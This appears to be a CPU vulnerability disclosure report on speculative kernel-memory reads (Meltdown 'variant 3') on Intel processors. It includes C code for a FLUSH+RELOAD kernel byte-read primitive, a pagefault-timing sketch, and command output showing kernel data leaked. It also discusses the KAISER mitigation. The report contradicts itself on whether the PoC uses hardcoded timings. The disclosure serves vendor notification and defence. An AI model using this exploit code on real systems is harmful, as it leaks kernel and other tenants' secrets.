== INTRODUCTION ==

This is a bug report about a CPU security issue that affects processors by Intel, AMD and (to some extent) ARM.

I have written a PoC for this issue that, when executed in userspace on an Intel Xeon CPU E5-1650 v3 machine with a modern Linux kernel, can leak around 2000 bytes per second from Linux kernel memory after a ~4-second startup, in a 4GiB address space window, with the ability to read from random offsets in that window. The same thing also works on an AMD PRO A8-9600 R7 machine, although a bit less reliably and more slowly. On the Intel CPU, I also have preliminary results that suggest that it may be possible to leak host memory (which would include memory owned by other guests) from inside a KVM guest.

The attack doesn't seem to work as well on ARM - perhaps because ARM CPUs don't perform as much speculative execution, possibly because of a different performance/energy tradeoff.

All PoCs are written against specific processors and will likely require at least some adjustments before they can run in other environments, e.g. because of hardcoded timing thresholds.

############################################################

On the following Intel CPUs (the only ones tested so far), we managed to leak information using another variant of this issue ("variant 3"). So far, we have not managed to leak information this way on AMD or ARM CPUs.

- Intel(R) Xeon(R) CPU E5-1650 v3 @ 3.50GHz (in a workstation)
- Intel(R) Core(TM) i7-6600U CPU @ 2.60GHz (in a laptop)

Apparently, on Intel CPUs, loads from kernel mappings in ring 3 during speculative execution have something like the following behavior:

- If the address is not mapped (perhaps also under other conditions?), instructions that depend on the load are not executed.

- If the address is mapped, but not sufficiently cached, the load loads zeroes, and instructions that depend on the load are executed. Perhaps Intel decided that in case of a sufficiently high-latency load, it makes sense to speculate ahead with a dummy value to get a chance to prefetch cachelines for dependent loads, or something like that?

- If the address is sufficiently cached, the load loads the data stored at the given address, without respecting the privilege level, and instructions that depend on the load are executed. This is the vulnerable case (see the sketch below).

I have attached a PoC that works on both tested Intel systems, named intel_kernel_read_poc.tar.
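To make the vulnerable (cached) case more concrete, here is a minimal sketch of the general pattern of turning it into a byte-read primitive: read the kernel byte in a transiently executed window, use it to index a userspace probe array, then recover it by timing which probe cache line became cached (FLUSH+RELOAD). This is not the code from intel_kernel_read_poc.tar; the SIGSEGV-based recovery, the probe layout and the CACHE_HIT_CYCLES threshold are my own assumptions and would need per-machine calibration, similar to the hardcoded timing thresholds mentioned above.

=====
/* Sketch only - NOT the attached PoC. Assumed threshold, needs tuning. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>
#include <setjmp.h>
#include <x86intrin.h>

#define CACHE_HIT_CYCLES 80   /* assumed cache-hit threshold, machine-specific */

static uint8_t probe[256 * 4096] __attribute__((aligned(4096)));
static sigjmp_buf recover;

static void segv_handler(int sig) {
    (void)sig;
    /* The kernel read faults architecturally; recover here and then
     * inspect the cache side effects left by transient execution. */
    siglongjmp(recover, 1);
}

/* Time a single access to *p in TSC cycles. */
static uint64_t time_access(volatile uint8_t *p) {
    unsigned int aux;
    uint64_t start = __rdtscp(&aux);
    (void)*p;
    return __rdtscp(&aux) - start;
}

/* Try to leak one byte: the transient dependent load touches one of
 * 256 probe cache lines, which FLUSH+RELOAD then detects. */
static int leak_byte(uintptr_t kernel_addr) {
    for (int i = 0; i < 256; i++)
        _mm_clflush(&probe[i * 4096]);
    _mm_mfence();

    if (sigsetjmp(recover, 1) == 0) {
        uint8_t secret = *(volatile uint8_t *)kernel_addr;  /* faults in ring 3 */
        (void)*(volatile uint8_t *)&probe[secret * 4096];   /* transient access */
    }

    for (int i = 0; i < 256; i++)
        if (time_access(&probe[i * 4096]) < CACHE_HIT_CYCLES)
            return i;
    return -1;  /* no hit; in practice uncached data shows up as zeroes */
}

int main(int argc, char **argv) {
    if (argc < 2) {
        fprintf(stderr, "usage: %s <hex kernel address>\n", argv[0]);
        return 1;
    }
    uintptr_t addr = (uintptr_t)strtoull(argv[1], NULL, 16);

    signal(SIGSEGV, segv_handler);
    memset(probe, 1, sizeof(probe));  /* ensure the probe pages are mapped */

    for (int off = 0; off < 16; off++) {
        int b = leak_byte(addr + off);
        if (b < 0)
            printf("?? ");
        else
            printf("%02x ", b);
    }
    printf("\n");
    return 0;
}
=====

The 4096-byte stride keeps each of the 256 candidate values on its own page so the hardware prefetcher doesn't blur the signal; a real exploit would retry each byte many times and filter noise rather than trust a single measurement.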
Usage:

As root, determine where the core_pattern is in the kernel:

=====
# grep core_pattern /proc/kallsyms
ffffffff81e8aea0 D core_pattern
=====

Then, as a normal user, unpack the PoC and use it to leak the core_pattern (and potentially other cached things around it) from kernel memory, using the pointer from the previous step:

=====
$ cat /proc/sys/kernel/core_pattern
/cores/%E.%p.%s.%t
$ ./compile.sh && time ./poc_test ffffffff81e8aea0 4096
ffffffff81e8aea0 2f 63 6f 72 65 73 2f 25 45 2e 25 70 2e 25 73 2e |/cores/%E.%p.%s.|
ffffffff81e8aeb0 25 74 00 61 70 70 6f 72 74 20 25 70 20 25 73 20 |%t.apport %p %s |
ffffffff81e8aec0 25 63 20 25 50 00 00 00 00 00 00 00 00 00 00 00 |%c %P...........|
[ zeroes ]
ffffffff81e8af20 c0 a4 e8 81 ff ff ff ff c0 af e8 81 ff ff ff ff |................|
ffffffff81e8af30 20 8e f0 81 ff ff ff ff 75 d9 cd 81 ff ff ff ff | .......u.......|
[ zeroes ]
ffffffff81e8bb60 65 5b cf 81 ff ff ff ff 00 00 00 00 00 00 00 00 |e[..............|
ffffffff81e8bb70 00 00 00 00 6d 41 00 00 00 00 00 00 00 00 00 00 |....mA..........|
[ zeroes ]

real    0m13.726s
user    0m9.820s
sys     0m3.908s
=====

As you can see, the core_pattern, part of the previous core_pattern (behind the first nullbyte) and a few kernel pointers were leaked. To confirm whether other leaked kernel data was leaked correctly, use gdb as root to read kernel memory:

=====
# gdb /bin/sleep /proc/kcore
[...]
(gdb) x/4gx 0xffffffff81e8af20
0xffffffff81e8af20:     0xffffffff81e8a4c0      0xffffffff81e8afc0
0xffffffff81e8af30:     0xffffffff81f08e20      0xffffffff81cdd975
(gdb) x/4gx 0xffffffff81e8bb60
0xffffffff81e8bb60:     0xffffffff81cf5b65      0x0000000000000000
0xffffffff81e8bb70:     0x0000416d00000000      0x0000000000000000
=====

Note that the PoC will report uncached bytes as zeroes.

To Intel: Please tell me if you have trouble reproducing this issue. Given how different my two test machines are, I would be surprised if this didn't just work out of the box on other CPUs from the same generation. This PoC doesn't have hardcoded timings or anything like that. We have not yet tested whether this still works after a TLB flush.

Regarding possible mitigations:

A short while ago, Daniel Gruss presented KAISER:

https://gruss.cc/files/kaiser.pdf
https://lkml.org/lkml/2017/5/4/220
(cached: https://webcache.googleusercontent.com/search?q=cache:Vys_INYdkOMJ:https://lkml.org/lkml/2017/5/4/220+&cd=1&hl=en&ct=clnk&gl=ch )
https://github.com/IAIK/KAISER

Basically, the issue that KAISER tries to mitigate is that on Intel CPUs, the timing of a pagefault reveals whether the address is unmapped or mapped as kernel-only (because for an unmapped address, a pagetable walk has to occur, while for a mapped address, the TLB can be used; a small user-space sketch of this timing difference is included at the end of this report). KAISER duplicates the top-level pagetables of all processes and switches them on kernel entry and exit. The kernel's top-level pagetable looks as before. In the top-level pagetable used while executing userspace code, most entries that are only used by the kernel are zeroed out, except for the kernel text and stack that are necessary to execute the syscall/exception entry code that has to switch back the pagetable.

I suspect that this approach might also be usable for mitigating variant 3, but I don't know how much TLB flushing / data cache flushing would be necessary to make it work.

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/43490.zip
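For reference, here is the user-space sketch of the pagefault timing side channel that KAISER addresses, as described above. This is an illustration under my own assumptions (signal-handler recovery, rdtscp timing, minimum over a few runs), not code from the attached PoC; the absolute cycle counts are dominated by signal delivery overhead, so only the relative difference between unmapped and kernel-mapped addresses is of interest.

=====
/* Sketch only - NOT the attached PoC. Times faulting accesses to
 * given addresses; a kernel-only mapping can be resolved from the
 * TLB, so its fault tends to be slightly faster than a fault on an
 * unmapped address, which needs a pagetable walk. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <setjmp.h>
#include <x86intrin.h>

static sigjmp_buf recover;

static void segv_handler(int sig) {
    (void)sig;
    siglongjmp(recover, 1);
}

/* Time one faulting access to addr, including signal delivery. */
static uint64_t time_fault(uintptr_t addr) {
    unsigned int aux;
    uint64_t start = __rdtscp(&aux);
    if (sigsetjmp(recover, 1) == 0)
        (void)*(volatile uint8_t *)addr;   /* always faults in ring 3 */
    return __rdtscp(&aux) - start;
}

int main(int argc, char **argv) {
    if (argc < 2) {
        fprintf(stderr, "usage: %s <hex address> [<hex address> ...]\n", argv[0]);
        return 1;
    }
    signal(SIGSEGV, segv_handler);

    for (int i = 1; i < argc; i++) {
        uintptr_t addr = (uintptr_t)strtoull(argv[i], NULL, 16);
        uint64_t best = UINT64_MAX;
        /* Take the minimum over a few runs to reduce noise; the first
         * fault also primes the TLB for mapped addresses. */
        for (int run = 0; run < 16; run++) {
            uint64_t t = time_fault(addr);
            if (t < best)
                best = t;
        }
        printf("%016llx: %llu cycles\n",
               (unsigned long long)addr, (unsigned long long)best);
    }
    return 0;
}
=====

Passing a mapped kernel address (e.g. one taken from /proc/kallsyms as root) alongside an address in an unmapped hole should, after the first run has primed the TLB, show the mapped address faulting measurably faster - which is exactly the distinguisher that KAISER's pagetable separation removes.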